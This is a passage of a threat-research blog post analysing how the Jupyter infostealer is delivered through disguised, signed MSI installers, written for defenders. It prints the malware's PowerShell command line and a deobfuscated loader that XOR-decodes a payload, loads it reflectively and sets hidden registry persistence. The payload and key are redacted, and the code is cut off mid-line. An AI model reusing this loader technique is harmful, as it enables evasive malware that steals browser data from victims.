# New Jupyter Evasive Delivery through MSI Installer **[blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)** Posted by [Nadav Lorber on September 21, 2021](https://blog.morphisec.com/author/nadav-lorber) Find me on: [Twitter](https://twitter.com/LNadav) [Tweet](https://twitter.com/share) ----- [In 2020, Morphisec introduced the Jupyter infostealer, a .NET attack that primarily targets](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction) Chromium, Firefox, and Chrome browser data while also maintaining the additional capabilities of a backdoor. Since that time, Jupyter has remained active and highly evasive. It has continued to receive very low to zero detections in the VirusTotal database, maintaining the ability to bypass detection solutions. Then, on 8 September 2021, we identified a new delivery chain within Jupyter that passes under the radar of security solutions. Following this discovery, the Morphisec Labs team has been made aware of multiple high-level targets that are under threat from the Jupyter infostealer. We are currently investigating the scope of the campaign. The blog post that follows outlines the new delivery chain, showcasing how threat actors continue to develop their attacks to become more efficient and evasive. _Editor's Note: This blog post has been updated as per the request of Advanced Installer._ ## Technical Introduction ----- Figure 1: The attack flow of the new Jupyter infostealer ### The MSI Payload In this section, we will briefly examine some of the payload`s shared attributes in order to get an overview of what indicators to expect. This is based on the six variants that we have observed. **Payload Size and Name** Like previous Jupyter payloads, the size of the MSI payloads is consistently over 100MBs. This allows the payload to thwart online AV scanners. The naming convention for the payload is: Potential document subjects Words are separated with a dash ‘-’ Each word starts with a capital letter Examples can be found in the IOCs section under the heading “MSI Payload Names.” **MSI Third-Party Installer Wizard** [The payloads were generated with a trial version of Advanced Installer (version 18.6.1 build](https://www.advancedinstaller.com/) _2c9a75c6)._ As described on their website, the Advanced Installer wizard is an ‘All-in-one’ application packaging tool. By using this tool, threat actors gain access to the easy implementation of obscured script executions. Customizing installer PowerShell operations is a legitimate functionality that the attackers misuse, as with other attack chains. This same operation is frequently used as part of legitimate products or services. We advise against flagging any PowerShell scripts originating from Advanced Installer without prior evaluation of the command itself. It is worth noting as well that PowerShell functionalities are also available in other installers ----- The attribution can be found either in the file properties (OLE Compound) or in the Installer property table. Figure 2: OLE Compound file information Figure 3: Property table **Decoy Installation Executable** As seen in Figure 1 above, all of the observed variants are described as Nitro Pro 13. Once the victim runs the MSI payload, it executes a legitimate installation binary of Nitro Pro 13. Correlating this attribution with the variant’s file names suggests that the delivery method disguises it as a PDF. ----- Figure 4: Nitro Pro 13 Installation While all of the variants are described as Nitro, one of them actually contains SumatraPDF instead. Figure 5: Sumatra PDF installation **Digital Signature** Two of the variants are signed with a (currently) valid certificate named ‘TACHOPARTS SP Z _O O’._ ----- Figure 6: Tachoparts certificate Based on the following certificate data, we can assume that the threat actor either impersonated the certificate or stole it from a legitimate business in Poland. Figure 7: Tachoparts' business information from Google ----- Another variant was signed with a revoked certificate named _OOO Sistema ._ Figure 8: OOO Sistema certificate As with the previous certificate, this one is also correlated with a legitimate business. It also was likely either an impersonation or stolen from the business. Figure 9: OOO Sistema business information from Google ----- The other 2 variants are signed with certificates named: FORMICA Solutions a.s. OOO Ruvents ### The PowerShell Execution The initial suspicious indicator visible in the dynamic analysis is the PowerShell commandline spawned by msiexec.exe. **Command Line** C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile Noninteractive -ExecutionPolicy Bypass -File 'C:\Users\\AppData\Local\Temp\pssEA35.ps1' -propFile 'C:\Users\\AppData\Local\Temp\msiEA13.txt' -scriptFile 'C:\Users\\AppData\Local\Temp\scrEA14.ps1' -scriptArgsFile 'C:\Users\\AppData\Local\Temp\scrEA15.txt' -propSep ' :<->: ' -testPrefix '_testValue.' Code block 1: CMD Shell command-line This command-line is generated by a feature in the Advanced Installer that is designed to execute the PowerShell loader as a ‘CustomAction’ attribute defined in MSI Installers. The file names within the parameters differ between variants but keep the same pattern. For example in ‘scrEA14.ps1’, the EA14 is represented by four hex characters. These four characters are different between the payload variants. Figure 9: PowerShell loader embedded in the CustomAction within AdvancedInstaller Figure 10: PowerShell loader embedded in the CustomAction within AdvancedInstaller ### Jupyter PowerShell loader ----- The PowerShell file in the -scriptFile parameter presented in Code block 1 represents the Jupyter PowerShell loader. This loader is very similar to the previous Jupyter loaders in that it keeps a very evasive file with low to 0 detections on VirusTotal, which is rare for a full PowerShell loader (loader code with an embedded payload). While the Jupyter loaders are widely covered in our and other blogs, the new variant shares the same code pattern. The following code block is an example of a deobfuscated and beautified version of it: $b64_enc_payload = 'deducted'; $random_path_str = jeiJBgXRTuVfsm; $payload_directory_path = "$ENV:APPDATA\Microsoft\" + $random_path_str; $enc_payload_path = $payload_directory_path + '\' + $random_path_str + '.' + $random_path_str; [System.IO.File]::WriteAllBytes($enc_payload_path, [System.Convert]::FromBase64String($b64_enc_payload)); $decode_and_execute_payload_script = 'below code embedded in comment' ''' $xor_key = "deducted base64 key"; $b64_enc_payload = [System.IO.File]::ReadAllBytes($enc_payload_path); For ($i = 0; $i -lt $b64_enc_payload.Count;) { For ($y = 0; $y -lt $xor_key.Length; $y++) { $b64_enc_payload[$i]=$b64_enc_payload[$i] -bxor $xor_key[$y]; $i++; if($i -ge $b64_enc_payload.Count) { $y=$xor_key.Length } } }; [System.Reflection.Assembly]::Load($b64_enc_payload); // Loads ‘interact’ method ''' Create_Registry_Key-reg_path (“) -execution_command ('Powershell WindowStyle Hidden -ep Bypass -Command " + $decode_and_execute_payload_script'); Create_Registry_Key-reg_path (“) execution_command$random_path_str.ToLower(); $lnk_object = New-Object-ComObjectWScript.Shell.CreateShortcut($ENV:APPDATA + '